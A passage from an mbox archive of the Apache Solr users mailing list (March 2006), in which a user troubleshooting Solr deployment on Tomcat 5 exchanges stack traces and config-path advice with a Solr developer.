java.lang.reflect.InvocationTargetException > > > at=20 > sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > > > at > > >=20 > sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccess > orImpl.jav > > > a:39) > > > at > > >=20 > sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMeth > odAccessor > > > Impl.java:25) > > > at java.lang.reflect.Method.invoke(Method.java:585) > > > at > > > org.mortbay.xml.XmlConfiguration.call(XmlConfiguration.java:502) > > > at > > >=20 > org.mortbay.xml.XmlConfiguration.configure(XmlConfiguration.java:216) > > > at > > >=20 > org.mortbay.xml.XmlConfiguration.newInstance(XmlConfiguration. > java:178) > > > at > > > org.mortbay.xml.XmlConfiguration.main(XmlConfiguration.java:872) > > > at=20 > sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > > > at > > >=20 > sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccess > orImpl.jav > > > a:39) > > > at > > >=20 > sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMeth > odAccessor > > > Impl.java:25) > > > at java.lang.reflect.Method.invoke(Method.java:585) > > > at org.mortbay.start.Main.invokeMain(Main.java:149) > > > at org.mortbay.start.Main.start(Main.java:478) > > > at org.mortbay.start.Main.main(Main.java:92) > > > Caused by: org.apache.solr.core.SolrException: undefined=20 > field attr1 > > > at=20 > org.apache.solr.schema.IndexSchema.getField(Unknown Source) > > > at=20 > org.apache.solr.schema.IndexSchema.readConfig(Unknown Source) > > > at=20 > org.apache.solr.schema.IndexSchema.<init>(Unknown Source) > > > at org.apache.solr.core.SolrCore.<init>(Unknown Source) > > > at=20 > org.apache.solr.core.SolrCore.getSolrCore(Unknown Source) > > > at=20 > org.apache.solr.servlet.SolrServlet.init(Unknown Source) > > > at=20 > javax.servlet.GenericServlet.init(GenericServlet.java:261) > > > at > > >=20 > org.mortbay.jetty.servlet.ServletHolder.initServlet(ServletHol > der.java:3 > > > 62) > > > at > > >=20 > org.mortbay.jetty.servlet.ServletHolder.doStart(ServletHolder. > java:219) > > > at > > >=20 > org.mortbay.component.AbstractLifeCycle.start(AbstractLifeCycl > e.java:37) > > > at > > >=20 > org.mortbay.jetty.servlet.ServletHandler.initialize(ServletHan > dler.java: > > > 565) > > > at > > >=20 > org.mortbay.jetty.webapp.WebAppContext.startContext(WebAppCont > ext.java:9 > > > 24) > > > at > > >=20 > org.mortbay.jetty.handler.ContextHandler.doStart(ContextHandle > r.java:341 > > > ) > > > at > > >=20 > org.mortbay.jetty.webapp.WebAppContext.doStart(WebAppContext.java:330) > > > at > > >=20 > org.mortbay.component.AbstractLifeCycle.start(AbstractLifeCycl > e.java:37) > > > at > > >=20 > org.mortbay.jetty.handler.HandlerCollection.doStart(HandlerCol > lection.ja > > > va:101) > > > at org.mortbay.jetty.Server.doStart(Server.java:235) > > > at > > >=20 > org.mortbay.component.AbstractLifeCycle.start(AbstractLifeCycl > e.java:37) > > > > > > > > > thx, > > > > > > -linda > > >=20 >=20 > -- > -Yonik > http://incubator.apache.org/solr Solr, The Open Source Lucene=20 > Search Server >=20 From [email protected] Mon Mar 20 16:20:42 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94290 invoked from network); 20 Mar 2006 16:20:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Mar 2006 16:20:41 -0000 Received: (qmail 70116 invoked by uid 500); 20 Mar 2006 16:20:41 -0000 Delivered-To: [email protected] Received: (qmail 70057 invoked by uid 500); 20 Mar 2006 16:20:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 70043 invoked by uid 99); 20 Mar 2006 16:20:40 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Mar 2006 08:20:40 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO pproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Mar 2006 08:20:39 -0800 Received: by pproxy.gmail.com with SMTP id z59so1571573pyg for <[email protected]>; Mon, 20 Mar 2006 08:20:18 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:mime-version:content-type; b=npcu/1Ijm5KCaJCO/R0fqcsuz9ONmoXN4pTRfBJojQDGroyz369UyyMZEdX/ia1qJOp3d/EwQvBOt2azM8wOBTeLzVVO61QNgunqd2hO2UU74DacgEYs6ZNPzfZDd6Undvvp8zLr6gBPzRRvlojY7Y2awUcdGcnOobTokGlIxbg= Received: by 161.129.204.104 with SMTP id a9mr503626qba; Mon, 20 Mar 2006 08:20:15 -0800 (PST) Received: by 161.129.204.104 with HTTP; Mon, 20 Mar 2006 08:20:15 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 20 Mar 2006 10:20:15 -0600 From: "Mike Austin" <[email protected]> To: [email protected] Subject: solr setup MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_1838_26397364.1142871615547" X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_1838_26397364.1142871615547 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline I'm trying to set solr up with CentOS 4.2, Apache 2.0.55, Tomcat 5, and Jav= a SDK 1.5 for the first time. I copied the solr.war to the tomcat webapps folder and it created the solr folders. I then try running the app with http://localhost:8080/solr/adminand I get an error (I don't have the error message now, I can get it later tonight if needed). Is there some other step besides just copying the war file? BTW, the tomcat example apps work find. Thanks, Mike ------=_Part_1838_26397364.1142871615547-- From [email protected] Mon Mar 20 16:28:15 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97745 invoked from network); 20 Mar 2006 16:28:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Mar 2006 16:28:13 -0000 Received: (qmail 59166 invoked by uid 500); 20 Mar 2006 16:28:13 -0000 Delivered-To: [email protected] Received: (qmail 59112 invoked by uid 500); 20 Mar 2006 16:28:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 59103 invoked by uid 99); 20 Mar 2006 16:28:12 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Mar 2006 08:28:12 -0800 X-ASF-Spam-Status: No, hits=0.3 required=10.0 tests=MAILTO_TO_SPAM_ADDR,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO uproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Mar 2006 08:28:11 -0800 Received: by uproxy.gmail.com with SMTP id j3so631716ugf for <[email protected]>; Mon, 20 Mar 2006 08:27:50 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=s6rOMNAcSG3sywTbqWwM01R3QOfUOTxSn0NGxcZt+P5/XJqQ8s76OX5v+6cR1QQD7j1JEQMNlIWe2xM/YaoZwgk0q8FO+hXh+YC6fhS8Jkw4EI3QIHWlE3waeheLA3+EyiEprT64+NIwfqo6U/Wr33tu8ezllos/XywhcXxBe0k= Received: by 161.129.204.104 with SMTP id q7mr2029997ugh; Mon, 20 Mar 2006 08:27:49 -0800 (PST) Received: by 161.129.204.104 with HTTP; Mon, 20 Mar 2006 08:27:49 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 20 Mar 2006 11:27:49 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: Re: solr setup In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 3/20/06, Mike Austin <[email protected]> wrote: > I'm trying to set solr up with CentOS 4.2, Apache 2.0.55, Tomcat 5, and J= ava > SDK 1.5 for the first time. > > I copied the solr.war to the tomcat webapps folder and it created the sol= r > folders. I then try running the app with > http://localhost:8080/solr/adminand I get an error (I don't have the > error message now, I can get it later > tonight if needed). Is there some other step besides just copying the war > file? Hi Mike, Solr needs to find it's config files. Check out the "example" directory of the solr distribution you downloaded. Solr currenty checks the ./solrconf/ directory for it's config, but that may soon change to ./solr/conf due to discussions on solr-dev. -Yonik From [email protected] Tue Mar 21 03:10:40 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 21416 invoked from network); 21 Mar 2006 03:10:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Mar 2006 03:10:39 -0000 Received: (qmail 93413 invoked by uid 500); 21 Mar 2006 03:10:39 -0000 Delivered-To: [email protected] Received: (qmail 93388 invoked by uid 500); 21 Mar 2006 03:10:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 93377 invoked by uid 99); 21 Mar 2006 03:10:39 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Mar 2006 19:10:39 -0800 X-ASF-Spam-Status: No, hits=0.3 required=10.0 tests=MAILTO_TO_SPAM_ADDR,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO zproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Mar 2006 19:10:38 -0800 Received: by zproxy.gmail.com with SMTP id l1so1334365nzf for <[email protected]>; Mon, 20 Mar 2006 19:10:17 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=LEOM5GyAU2YylOHso7QdUpPCVvKzu+XRsDT83kriLz/MLPFm7jJv73Rtk8RPhEnrbzOmB303ThwLwCd8FEeD9xDHhBy2BC0fZJSaYt7uckwWQWt+Tm9Tfjv1THSaXnfY5lWZ4JfS1gBNCSHXn0FGvlfqg8S+27+4Oqg5B3kgjfQ= Received: by 161.129.204.104 with SMTP id c19mr1536063qbl; Mon, 20 Mar 2006 19:10:17 -0800 (PST) Received: by 161.129.204.104 with HTTP; Mon, 20 Mar 2006 19:10:16 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 20 Mar 2006 21:10:16 -0600 From: "Mike Austin" <[email protected]> To: [email protected] Subject: Re: solr setup In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Thanks Yonik, I fixed the conf issue.. now I get this. Any ideas? 2006-03-20 20:42:09 StandardWrapperValve[jsp]: Servlet.service() for servlet jsp threw exception java.lang.NoClassDefFoundError =09at org.apache.jsp.admin.index_jsp._jspService(index_jsp.java:67) =09at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:94) =09at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) =09at org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper= .java:324) =09at org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:2= 92) =09at org.apache.jasper.servlet.JspServlet.service(JspServlet.java:236) =09at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) =09at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(Appl= icationFilterChain.java:237) =09at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationF= ilterChain.java:157) =09at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperV= alve.java:214) =09at org.apache.catalina.core.StandardValveContext.invokeNext(StandardValv= eContext.java:104) =09at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.jav= a:520) =09at org.apache.catalina.core.StandardContextValve.invokeInternal(Standard= ContextValve.java:198) =09at org.apache.catalina.core.StandardContextValve.invoke(StandardContextV= alve.java:152) =09at org.apache.catalina.core.StandardValveContext.invokeNext(StandardValv= eContext.java:104) =09at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.jav= a:520) =09at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.j= ava:137) =09at org.apache.catalina.core.StandardValveContext.invokeNext(StandardValv= eContext.java:104) =09at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.j= ava:118) =09at org.apache.catalina.core.StandardValveContext.invokeNext(StandardValv= eContext.java:102) =09at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.jav= a:520) =09at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineVal= ve.java:109) =09at org.apache.catalina.core.StandardValveContext.invokeNext(StandardValv= eContext.java:104) =09at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.jav= a:520) =09at org.apache.catalina.core.ContainerBase.invoke(ContainerBase.java:929) =09at org.apache.coyote.tomcat5.CoyoteAdapter.service(CoyoteAdapter.java:16= 0) =09at org.apache.coyote.http11.Http11Processor.process(Http11Processor.java= :799) =09at org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler.proce= ssConnection(Http11Protocol.java:705) =09at org.apache.tomcat.util.net.TcpWorkerThread.runIt(PoolTcpEndpoint.java= :577) =09at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadP= ool.java:683) =09at java.lang.Thread.run(Thread.java:595) On 3/20/06, Yonik Seeley <[email protected]> wrote: > On 3/20/06, Mike Austin <[email protected]> wrote: > > I'm trying to set solr up with CentOS 4.2, Apache 2.0.55, Tomcat 5, and > Java > > SDK 1.5 for the first time. > > > > I copied the solr.war to the tomcat webapps folder and it created the s= olr > > folders. I then try running the app with > > http://localhost:8080/solr/adminand I get an error (I don't have the > > error message now, I can get it later > > tonight if needed). Is there some other step besides just copying the w= ar > > file? > > Hi Mike, > Solr needs to find it's config files. Check out the "example" > directory of the solr distribution you downloaded. Solr currenty > checks the ./solrconf/ directory for it's config, but that may soon > change to ./solr/conf due to discussions on solr-dev. > > -Yonik > From [email protected] Tue Mar 21 03:57:51 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51820 invoked from network); 21 Mar 2006 03:57:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Mar 2006 03:57:51 -0000 Received: (qmail 38693 invoked by uid 500); 21 Mar 2006 03:57:51 -0000 Delivered-To: [email protected] Received: (qmail 38677 invoked by uid 500); 21 Mar 2006 03:57:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38668 invoked by uid 99); 21 Mar 2006 03:57:51 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Mar 2006 19:57:51 -0800 X-ASF-Spam-Status: No, hits=0.3 required=10.0 tests=MAILTO_TO_SPAM_ADDR,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO uproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Mar 2006 19:57:50 -0800 Received: by uproxy.gmail.com with SMTP id y2so686888uge for <[email protected]>; Mon, 20 Mar 2006 19:57:29 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=LabIyMLklEiOK37h/H7UbU3ewC52pUIGekPzFXtSwE/TLWTGWoR2paqKyZZ4WvHRG56Zzr924lb6+Ba9aYTMf9apRtGBTHcHFJDZJYU9RNZWHsiRKkQWvlVBwUovZlZxjkwn0FYOwaABRDt3m0z904AcXeW196sN/BKfLt7wDDw= Received: by 161.129.204.104 with SMTP id y17mr2309715ugi; Mon, 20 Mar 2006 19:57:29 -0800 (PST) Received: by 161.129.204.104 with HTTP; Mon, 20 Mar 2006 19:57:28 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 20 Mar 2006 22:57:28 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: Re: solr setup In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N I'm not sure what to make of that error... I don't see what class is trying to be found that results in the "NoClassDefFoundError". I've personally only tried Solr with Tomcat 5.5, Resin 3, and Jetty 6. Perhaps you could try upgrading to Tomcat 5.5? -Yonik On 3/20/06, Mike Austin <[email protected]> wrote: > Thanks Yonik, > > I fixed the conf issue.. now I get this. Any ideas? > > 2006-03-20 20:42:09 StandardWrapperValve[jsp]: Servlet.service() for > servlet jsp threw exception > java.lang.NoClassDefFoundError > at org.apache.jsp.admin.index_jsp._jspService(index_jsp.java:67) > at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java= :94) > at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) > at org.apache.jasper.servlet.JspServletWrapper.service(JspServlet= Wrapper.java:324) > at org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet= .java:292) > at org.apache.jasper.servlet.JspServlet.service(JspServlet.java:2= 36) > at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) > at org.apache.catalina.core.ApplicationFilterChain.internalDoFilt= er(ApplicationFilterChain.java:237) > at org.apache.catalina.core.ApplicationFilterChain.doFilter(Appli= cationFilterChain.java:157) > at org.apache.catalina.core.StandardWrapperValve.invoke(StandardW= rapperValve.java:214) > at org.apache.catalina.core.StandardValveContext.invokeNext(Stand= ardValveContext.java:104) > at org.apache.catalina.core.StandardPipeline.invoke(StandardPipel= ine.java:520) > at org.apache.catalina.core.StandardContextValve.invokeInternal(S= tandardContextValve.java:198) > at org.apache.catalina.core.StandardContextValve.invoke(StandardC= ontextValve.java:152) > at org.apache.catalina.core.StandardValveContext.invokeNext(Stand= ardValveContext.java:104) > at org.apache.catalina.core.StandardPipeline.invoke(StandardPipel= ine.java:520) > at org.apache.catalina.core.StandardHostValve.invoke(StandardHost= Valve.java:137) > at org.apache.catalina.core.StandardValveContext.invokeNext(Stand= ardValveContext.java:104) > at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReport= Valve.java:118) > at org.apache.catalina.core.StandardValveContext.invokeNext(Stand= ardValveContext.java:102) > at org.apache.catalina.core.StandardPipeline.invoke(StandardPipel= ine.java:520) > at org.apache.catalina.core.StandardEngineValve.invoke(StandardEn= gineValve.java:109) > at org.apache.catalina.core.StandardValveContext.invokeNext(Stand= ardValveContext.java:104) > at org.apache.catalina.core.StandardPipeline.invoke(StandardPipel= ine.java:520) > at org.apache.catalina.core.ContainerBase.invoke(ContainerBase.ja= va:929) > at org.apache.coyote.tomcat5.CoyoteAdapter.service(CoyoteAdapter.= java:160) > at org.apache.coyote.http11.Http11Processor.process(Http11Process= or.java:799) > at org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandle= r.processConnection(Http11Protocol.java:705) > at org.apache.tomcat.util.net.TcpWorkerThread.runIt(PoolTcpEndpoi= nt.java:577) > at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(= ThreadPool.java:683) > at java.lang.Thread.run(Thread.java:595) > > On 3/20/06, Yonik Seeley <[email protected]> wrote: > > On 3/20/06, Mike Austin <[email protected]> wrote: > > > I'm trying to set solr up with CentOS 4.2, Apache 2.0.55, Tomcat 5, a= nd > > Java > > > SDK 1.5 for the first time. > > > > > > I copied the solr.war to the tomcat webapps folder and it created the= solr > > > folders. I then try running the app with > > > http://localhost:8080/solr/adminand I get an error (I don't have the > > > error message now, I can get it later > > > tonight if needed). Is there some other step besides just copying the= war > > > file? > > > > Hi Mike, > > Solr needs to find it's config files. Check out the "example" > > directory of the solr distribution you downloaded. Solr currenty > > checks the ./solrconf/ directory for it's config, but that may soon > > change to ./solr/conf due to discussions on solr-dev. > > > > -Yonik > > > -- -Yonik http://incubator.apache.org/solr Solr, The Open Source Lucene Search Server From [email protected] Tue Mar 21 04:11:11 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6438 invoked from network); 21 Mar 2006 04:11:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Mar 2006 04:11:11 -0000 Received: (qmail 47106 invoked by uid 500); 21 Mar 2006 04:11:11 -0000 Delivered-To: [email protected] Received: (qmail 47051 invoked by uid 500); 21 Mar 2006 04:11:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 47039 invoked by uid 99); 21 Mar 2006 04:11:11 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Mar 2006 20:11:11 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO zproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Mar 2006 20:11:10 -0800 Received: by zproxy.gmail.com with SMTP id i11so1273865nzh for <[email protected]>; Mon, 20 Mar 2006 20:10:49 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=ttgwdSL1YwNLdlqqJi/rVWPqlIln27KWHlq8P52Kagk/54NOL9GEiJXCGNTklLgN50sXSo6K+3Qzs6IFwMEf+M9vdEX6nN7tRHGQ/QIf0NHAy2iuas/zlMhQ1UaM4e1+80cQeyANMPwPvzV5uQ27Iqap+W65plOcarS1iRa8llI= Received: by 161.129.204.104 with SMTP id k20mr956106qbn; Mon, 20 Mar 2006 20:10:49 -0800 (PST) Received: by 161.129.204.104 with HTTP; Mon, 20 Mar 2006 20:10:49 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 20 Mar 2006 22:10:49 -0600 From: "Mike Austin" <[email protected]> To: [email protected] Subject: Re: solr setup In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Actually.. it looks like it is still not finding solrconfig.xml because aft= er I restart tomcat I get the config file error. Where should this go again= ? I know you said ./solrconf, but relative to what?=20 Also, I still don't know if I deployed the site correctly..the only thing I= did was copy the solr.war to the tomcat/webapps folder. Thanks =20 From [email protected] Tue Mar 21 04:35:59 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12979 invoked from network); 21 Mar 2006 04:35:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Mar 2006 04:35:59 -0000 Received: (qmail 63018 invoked by uid 500); 21 Mar 2006 04:35:56 -0000 Delivered-To: [email protected] Received: (qmail 62982 invoked by uid 500); 21 Mar 2006 04:35:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 62950 invoked by uid 99); 21 Mar 2006 04:35:56 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Mar 2006 20:35:56 -0800 X-ASF-Spam-Status: No, hits=0.3 required=10.0 tests=MAILTO_TO_SPAM_ADDR,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO uproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Mar 2006 20:35:56 -0800 Received: by uproxy.gmail.com with SMTP id c2so634356ugf for <[email protected]>; Mon, 20 Mar 2006 20:35:34 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=YhFfKv/WzuzVp5Bt5C3/ToRyhS2EBEc6Pgqe0XwqEIdDk9f2kXpvdmfstvA/OrlON0xQ6cWhyZ0SdlXBtQiH4mAmy62X6pN5rIoQHceyByi+RYBSuAu89o59iFE97hZ4cjOPcF2qsZ+kyYc2/+YE6/rM6DFGX8UqX117zu8R2lk= Received: by 161.129.204.104 with SMTP id g5mr2080200ugh; Mon, 20 Mar 2006 20:35:34 -0800 (PST) Received: by 161.129.204.104 with HTTP; Mon, 20 Mar 2006 20:35:34 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 20 Mar 2006 23:35:34 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: Re: solr setup In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 3/20/06, Mike Austin <[email protected]> wrote: > Actually.. it looks like it is still not finding solrconfig.xml because a= fter I restart tomcat I get the config file error. Where should this go aga= in? I know you said ./solrconf, but relative to what? Solr looks in ./solrconf, relative to the current working directory.=20 The current working directory is normally where you are when you start the app-server (so don't cd to bin first). > Also, I still don't know if I deployed the site correctly..the only thing= I did was copy the solr.war to the tomcat/webapps folder. That should be fine. -Yonik From [email protected] Tue Mar 21 04:37:25 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13210 invoked from network); 21 Mar 2006 04:37:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Mar 2006 04:37:25 -0000 Received: (qmail 63885 invoked by uid 500); 21 Mar 2006 04:37:25 -0000 Delivered-To: [email protected] Received: (qmail 63831 invoked by uid 500); 21 Mar 2006 04:37:25 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 63822 invoked by uid 99); 21 Mar 2006 04:37:25 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Mar 2006 20:37:25 -0800 X-ASF-Spam-Status: No, hits=0.3 required=10.0 tests=MAILTO_TO_SPAM_ADDR,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Mar 2006 20:37:24 -0800 Received: by wproxy.gmail.com with SMTP id i5so24803wra for <[email protected]>; Mon, 20 Mar 2006 20:37:03 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; 